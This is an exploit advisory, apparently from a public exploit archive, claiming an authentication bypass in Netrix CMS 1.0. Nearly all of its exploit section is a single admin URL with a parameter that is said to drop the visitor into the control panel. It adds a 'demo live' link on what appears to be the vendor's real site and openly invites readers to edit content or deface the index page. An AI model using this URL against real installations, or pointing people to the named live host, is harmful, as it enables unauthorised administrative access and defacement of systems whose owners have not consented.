id: 5518
date: 07/19/2009
title: Netrix CMS 1.0 Authentication Bypass Vulnerability
author: Mr.tro0oqy
cves: 

==================================================
Netrix CMS 1.0 Authentication Bypass Vulnerability
==================================================


=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :Netrix CMS 1.0 (Auth Bypass) Remote SQL Injection Vulnerability

[+] Found by : Mr.tro0oqy  

[+] Script site : www.netrix.hu
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
Exploit : 
---------
http://www.site.com/path/admin/cikkform.php?cid=1
---------

u in control panel 


control panel :
-------------
http://www.site.com/path/admin
-------------



Demo live : 
-----------
http://cms.netrix.hu/admin/cikkform.php?cid=1
-----------

u can edit anything or put on your index ;)



#  0day.today [2023-03-22]  #